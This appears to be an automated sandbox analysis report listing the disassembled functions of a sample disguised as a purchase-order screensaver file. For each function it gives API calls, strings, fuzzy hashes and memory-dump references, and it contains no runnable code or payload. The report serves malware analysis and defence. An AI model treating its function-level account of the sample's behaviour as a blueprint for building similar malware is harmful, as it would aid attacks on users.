MapVirtualKeyW.USER32(00000010,00000000), ref: 00410997
MapVirtualKeyW.USER32(000000A0,00000000), ref: 004109A2
MapVirtualKeyW.USER32(000000A1,00000000), ref: 004109AD
MapVirtualKeyW.USER32(00000011,00000000), ref: 004109B5
MapVirtualKeyW.USER32(00000012,00000000), ref: 004109BD

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: Virtual
String ID:
API String ID: 4278518827-0
Opcode ID: 067efc0be0420d5e011611900d1cbcbd564411b72165316cb005851f0732894c
Instruction ID: 14dd698fb88c41d3cb2937c08abaa7ad6cdafd80764dd657d9f2199fb51feb0a
Opcode Fuzzy Hash: 067efc0be0420d5e011611900d1cbcbd564411b72165316cb005851f0732894c
Instruction Fuzzy Hash: 52112A6118ABC4ADD3329F694854A87FFE45FB6304F484A8ED1D607A43C195A60CCBBA

Function 0044CBD3 Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 0044CBEF
GetDeviceCaps.GDI32(00000000,00000058), ref: 0044CC00
GetDeviceCaps.GDI32(00000000,0000005A), ref: 0044CC09
ReleaseDC.USER32(00000000,00000000), ref: 0044CC10
MulDiv.KERNEL32(000009EC,?,?), ref: 0044CC29
MulDiv.KERNEL32(000009EC,?,00000000), ref: 0044CC37

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: CapsDevice$Release
String ID:
API String ID: 1035833867-0
Opcode ID: ae25b50e6df40ac1760f249dbc4ceec79d7598f555d49c24eefaf783d5b8ff63
Instruction ID: 50bf861fd692b93b916a63282857a41227f0dfa19545bc4f0a59f576ae553c11
Opcode Fuzzy Hash: ae25b50e6df40ac1760f249dbc4ceec79d7598f555d49c24eefaf783d5b8ff63
Instruction Fuzzy Hash: 560184B1641314BFF6009BA1DC4AF1BBB9CEF55755F01842EFF44A7241D6B098008BA9

Function 0044B64F Relevance: 9.0, APIs: 6, Instructions: 40synchronizationthreadCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(0042A369,057401F8), ref: 0044B66E
EnterCriticalSection.KERNEL32(0042A321), ref: 0044B67B
TerminateThread.KERNEL32(?,000001F6), ref: 0044B689
WaitForSingleObject.KERNEL32(?,000003E8,?,000001F6), ref: 0044B697

Part of subcall function 004356CD: CloseHandle.KERNEL32(00000000,0042A365,0044B6A3,0042A365,?,000003E8,?,000001F6), ref: 004356D9

InterlockedExchange.KERNEL32(0042A369,000001F6), ref: 0044B6AC
LeaveCriticalSection.KERNEL32(0042A321), ref: 0044B6AF

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
String ID:
API String ID: 3495660284-0
Opcode ID: 7ab0c325316775d38e8d9aa2ca09049d0c02a968ddf60f226b23d446a35990e5
Instruction ID: 3e278a896620ffa5fdfd5bcc44ba61fc9bc9ab212b345b13b81bb6ec37c91fca
Opcode Fuzzy Hash: 7ab0c325316775d38e8d9aa2ca09049d0c02a968ddf60f226b23d446a35990e5
Instruction Fuzzy Hash: E3F0F672141206BBD210AB24EE89DBFB37CFF44315F41096AF60142550CB75F811CBBA

Function 00437118 Relevance: 9.0, APIs: 6, Instructions: 37windowtimethreadCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00437127
SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00437140
GetWindowThreadProcessId.USER32(?,?), ref: 00437150
OpenProcess.KERNEL32(001F0FFF,00000000,?), ref: 00437162
TerminateProcess.KERNEL32(00000000,00000000), ref: 0043716D
CloseHandle.KERNEL32(00000000), ref: 00437174

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
String ID:
API String ID: 839392675-0
Opcode ID: 9671eea5464782d863345c1ba519a7d6af1158a8c6613e6f42f5b6706bbe0782
Instruction ID: 38550948ec006cf47bed7574f40cc63f5aae242ba43c895826076912260f23cd
Opcode Fuzzy Hash: 9671eea5464782d863345c1ba519a7d6af1158a8c6613e6f42f5b6706bbe0782
Instruction Fuzzy Hash: 37F054352813117BE6215B109E4EFEF37A8AF49F02F104828FB41B51D0E7E469458BAE

Function 0043604B Relevance: 9.0, APIs: 6, Instructions: 33serviceCOMMON

Download Yara Rule

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,00000008,004A8E80,BC000000,00431B28,C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe,00000004), ref: 00436055
LockServiceDatabase.ADVAPI32(00000000), ref: 00436062
UnlockServiceDatabase.ADVAPI32(00000000), ref: 0043606D
CloseServiceHandle.ADVAPI32(00000000), ref: 00436076
GetLastError.KERNEL32 ref: 00436081
CloseServiceHandle.ADVAPI32(00000000), ref: 00436091

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: Service$CloseDatabaseHandle$ErrorLastLockManagerOpenUnlock
String ID:
API String ID: 1690418490-0
Opcode ID: 49e5e78db470eb3b31ed20f2670ed0ea18d225c835d46e40371f5509899a8be7
Instruction ID: 156e5f382d75df54ba3c5c30185d6bb62b1a9e6e0194ec4ef6b9e4a62dbea0b3
Opcode Fuzzy Hash: 49e5e78db470eb3b31ed20f2670ed0ea18d225c835d46e40371f5509899a8be7
Instruction Fuzzy Hash: 9BE0E5319821216BC6231B30AE4DBCF3B99DB1F311F041827F701D2250CB998404DBA8

Function 00475ACA Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 237comCOMMON

Download Yara Rule

APIs

Part of subcall function 00442C52: _wcslen.LIBCMT ref: 00442C82

CoInitialize.OLE32(00000000), ref: 00475B71
CoCreateInstance.OLE32(00482A50,00000000,00000001,004828B0,?), ref: 00475B8A
CoUninitialize.OLE32 ref: 00475D71

Strings

HH, xrefs: 00475B3A
.lnk, xrefs: 00475B16, 00475B29

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: CreateInitializeInstanceUninitialize_wcslen
String ID: .lnk$HH
API String ID: 886957087-3121654589
Opcode ID: 75a96ccae25093af7e6917375c938c281093df7f6cda4de25b1c017a61ab28fd
Instruction ID: f4d7caca580305710a2a5ca379fd8543151c5613ecc12b631d1ff665410dc3a0
Opcode Fuzzy Hash: 75a96ccae25093af7e6917375c938c281093df7f6cda4de25b1c017a61ab28fd
Instruction Fuzzy Hash: B0819D75604300AFD310EF65CC82F5AB3A9EF88704F50892DF658AF2D2D6B5E905CB99

Function 0045F132 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 128windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0045F1A0
GetMenuItemInfoW.USER32 ref: 0045F1B9
DeleteMenu.USER32(?,?,00000000), ref: 0045F218
DeleteMenu.USER32(?,?,00000000), ref: 0045F27A

Strings

0, xrefs: 0045F198

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: Menu$Delete$InfoItem_memset
String ID: 0
API String ID: 1173514356-4108050209
Opcode ID: e31d5a25326cfad936127cde49464cb56a2d17833d4ec3f4ad79405d5b41ed43
Instruction ID: b3a4179b3c174fb1a3aa0d908437eb3f68f1f523a6631853a4ee88e897a1c7ed
Opcode Fuzzy Hash: e31d5a25326cfad936127cde49464cb56a2d17833d4ec3f4ad79405d5b41ed43
Instruction Fuzzy Hash: 31418CB55043019BD710CF19C884B5BBBE5AFC5324F148A6EFCA49B282C375E809CBA6

Function 004692E4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 98windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71

SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00469368
SendMessageW.USER32(00000000,0000018A,00000000,00000000), ref: 00469379
SendMessageW.USER32(?,?,00000000,00000000), ref: 004693AB

Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2

Strings

ListBox, xrefs: 00469323
ComboBox, xrefs: 004692EF

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: MessageSend$_wcslen
String ID: ComboBox$ListBox
API String ID: 763830540-1403004172
Opcode ID: 509af3a058f8d2ccd68eb6fec456bdedc6df801b0ffdee10d368a4f30f08f539
Instruction ID: 8c71ebf423f389569590ff88e643f185c263fd61562863516bde62979c95be4e
Opcode Fuzzy Hash: 509af3a058f8d2ccd68eb6fec456bdedc6df801b0ffdee10d368a4f30f08f539
Instruction Fuzzy Hash: E0210C7160020067C210BB3A9C46FAF77989B85364F09052FF959AB3D1EA7CE94A436E

Function 00443981 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 86COMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(?), ref: 004439B4

Part of subcall function 0043569D: GetCurrentProcess.KERNEL32(0000002C,00000000,00000000,00000002,74DF2EE0,00000000,004437E2,?,0000002C,00000000,?,?,?), ref: 004356BD
Part of subcall function 0043569D: GetCurrentProcess.KERNEL32(?,00000000,?,?,?), ref: 004356C1
Part of subcall function 0043569D: DuplicateHandle.KERNEL32(00000000,?,?,?), ref: 004356C4

Strings

nul, xrefs: 00443A2D

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: CurrentHandleProcess$Duplicate
String ID: nul
API String ID: 2124370227-2873401336
Opcode ID: 1f0ba76bcec97c73efa3faab39b1dec00fe260a428cb25b20c1b65e4e3d5eb1c
Instruction ID: e5202fea31d744cc2812a948a395a4146b23d8233fafbd02014e3d546f800e0b
Opcode Fuzzy Hash: 1f0ba76bcec97c73efa3faab39b1dec00fe260a428cb25b20c1b65e4e3d5eb1c
Instruction Fuzzy Hash: 8921A070104301ABE320DF28D886B9B77E4AF94B24F504E1EF9D4972D1E3B5DA54CBA6

Function 00443887 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 85COMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F6), ref: 004438B7

Part of subcall function 0043569D: GetCurrentProcess.KERNEL32(0000002C,00000000,00000000,00000002,74DF2EE0,00000000,004437E2,?,0000002C,00000000,?,?,?), ref: 004356BD
Part of subcall function 0043569D: GetCurrentProcess.KERNEL32(?,00000000,?,?,?), ref: 004356C1
Part of subcall function 0043569D: DuplicateHandle.KERNEL32(00000000,?,?,?), ref: 004356C4

Strings

nul, xrefs: 00443931

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: CurrentHandleProcess$Duplicate
String ID: nul
API String ID: 2124370227-2873401336
Opcode ID: 1c1504a6ed80816e8cc684f5e798812a6452e5ed6eae5ac994518d836d8835bd
Instruction ID: 183321404fa0000a7fb955016a75d3ae5bd0bbc3c7f5d4043dd6f74a8503dfc6
Opcode Fuzzy Hash: 1c1504a6ed80816e8cc684f5e798812a6452e5ed6eae5ac994518d836d8835bd
Instruction Fuzzy Hash: 4E2182701002019BE210DF28DC45F9BB7E4AF54B34F204A1EF9E4962D0E7759654CB56

Function 004412AE Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 84windowlibraryCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00441333
LoadLibraryW.KERNEL32(?,?,?,?,0047B4D0,?,?,?,?,?,?,?,?,?,00000000), ref: 0044133A
SendMessageW.USER32(?,00000467,00000000,?), ref: 00441352
DestroyWindow.USER32(00000000,?,00000467,00000000,?,?,?,?,0047B4D0,?,?,?,?,?,?), ref: 0044135B

Strings

SysAnimate32, xrefs: 00441311

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: MessageSend$DestroyLibraryLoadWindow
String ID: SysAnimate32
API String ID: 3529120543-1011021900
Opcode ID: 7eb070968e116bc4f0d30e0eba70c7f8d943bdaa5f5f9b6b4db71aa758301bcd
Instruction ID: 28effd0bdeb99d0e0a50349a2d6ccdc4655b9339127a2247ff1827a793b197f6
Opcode Fuzzy Hash: 7eb070968e116bc4f0d30e0eba70c7f8d943bdaa5f5f9b6b4db71aa758301bcd
Instruction Fuzzy Hash: D0216271204301ABF7209AA5DC84F6B73ECEBD9724F104A1EF651D72E0D6B4DC818729

Function 00443009 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 82windowCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32(00000000,00000000,00000000,00000000,00000001), ref: 0044304E
TranslateMessage.USER32(?), ref: 0044308B
DispatchMessageW.USER32(?), ref: 00443096
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 004430AD

Strings

*.*, xrefs: 00443036

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: Message$Peek$DispatchTranslate
String ID: *.*
API String ID: 1795658109-438819550
Opcode ID: a5394e60fa5dc12563cec3cf09e66162f870e5be06c650d2d1f2ad27f88770fd
Instruction ID: a39ada88e739a490af96418dc0f35d82e94fc94c1e76e22fe960a83301852fb1
Opcode Fuzzy Hash: a5394e60fa5dc12563cec3cf09e66162f870e5be06c650d2d1f2ad27f88770fd
Instruction Fuzzy Hash: 9F2138715183419EF720DF289C80FA3B7949B60B05F008ABFF66492191E6B99608C76E

Function 004609BD Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 76windowCOMMON

Download Yara Rule

APIs

Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2

Part of subcall function 004389A1: SendMessageTimeoutW.USER32(00000001,00000000,00000000,00000000,00000002,00001388,004848E8), ref: 004389C0
Part of subcall function 004389A1: GetWindowThreadProcessId.USER32(00000001,00000000), ref: 004389D3
Part of subcall function 004389A1: GetCurrentThreadId.KERNEL32 ref: 004389DA
Part of subcall function 004389A1: AttachThreadInput.USER32(00000000), ref: 004389E1

GetFocus.USER32 ref: 004609EF

Part of subcall function 004389EB: GetParent.USER32(?), ref: 004389F7
Part of subcall function 004389EB: GetParent.USER32(?), ref: 00438A04

GetClassNameW.USER32(?,?,00000100), ref: 00460A37
EnumChildWindows.USER32(?,00445A31,?), ref: 00460A60
__swprintf.LIBCMT ref: 00460A7A

Strings

%s%d, xrefs: 00460A74

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: Thread$Parent$AttachChildClassCurrentEnumFocusInputMessageNameProcessSendTimeoutWindowWindows__swprintf_wcslen
String ID: %s%d
API String ID: 991886796-1110647743
Opcode ID: 4a64ff5b06e5e341b473abb9bc2bdd7182ed8da111ba9effa567358a3114916c
Instruction ID: 20a4aa43144560c0524e92d1094e5dcb4402c89d1d481f65a72662ac57dae138
Opcode Fuzzy Hash: 4a64ff5b06e5e341b473abb9bc2bdd7182ed8da111ba9effa567358a3114916c
Instruction Fuzzy Hash: 7521A4712403046BD610FB65DC8AFEFB7ACAF98704F00481FF559A7181EAB8A509877A

Function 0040F790 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 69COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0040F7F9
_memset.LIBCMT ref: 0040F803
_memset.LIBCMT ref: 0040F810
_sprintf.LIBCMT ref: 0040F82F

Strings

%02X, xrefs: 0040F829

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: _memset$_sprintf
String ID: %02X
API String ID: 891462717-436463671
Opcode ID: 3d61b25fa3990800e5a694d7793c27d494b4b6e65897825e99c1223689708875
Instruction ID: c3235ccac5cd273424cb9b73a8b9e0f10e05fa8943de770f4571b5c3e9b76774
Opcode Fuzzy Hash: 3d61b25fa3990800e5a694d7793c27d494b4b6e65897825e99c1223689708875
Instruction Fuzzy Hash: 5B11E97225021167D314FA698C93BEE724CAB45704F50453FF541A75C1EF6CB558839E

Function 0040F3B0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 49COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0042CD00
GetOpenFileNameW.COMDLG32 ref: 0042CD51

Part of subcall function 0040FFB0: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe,?,C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe,004A8E80,C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe,0040F3D2), ref: 0040FFCA

Part of subcall function 00410130: SHGetMalloc.SHELL32(00000000), ref: 0041013A
Part of subcall function 00410130: SHGetDesktopFolder.SHELL32(?,004A8E80), ref: 00410150
Part of subcall function 00410130: _wcscpy.LIBCMT ref: 00410160
Part of subcall function 00410130: SHGetPathFromIDListW.SHELL32(?,?), ref: 00410197
Part of subcall function 00410130: _wcscpy.LIBCMT ref: 004101AC

Part of subcall function 00410020: GetFullPathNameW.KERNEL32(?,00000104,?,?,?), ref: 00410037

Strings

$OH, xrefs: 0042CD15
X, xrefs: 0042CD0D
@OH, xrefs: 0042CD31

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: NamePath$Full_wcscpy$DesktopFileFolderFromListMallocOpen_memset
String ID: $OH$@OH$X
API String ID: 3491138722-1394974532
Opcode ID: b307b7495d9e484b77ad3edce91dc90ef7c994e26f1a80758083a935cdf7c966
Instruction ID: e3e81f3fa603e1d093c5df9e9287f390c0398a0e5563e0e16fb911f44c5f658a
Opcode Fuzzy Hash: b307b7495d9e484b77ad3edce91dc90ef7c994e26f1a80758083a935cdf7c966
Instruction Fuzzy Hash: 2111C2B02043405BC311EF19984175FBBE9AFD5308F14882EF68497292D7FD854DCB9A

Function 00463D7E Relevance: 7.6, APIs: 5, Instructions: 141libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(00000000), ref: 00463DD1
GetProcAddress.KERNEL32(?,?), ref: 00463E68
GetProcAddress.KERNEL32(?,00000000), ref: 00463E84
GetProcAddress.KERNEL32(?,?), ref: 00463ECE
FreeLibrary.KERNEL32(?,?,?,00000000,?), ref: 00463EF0

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

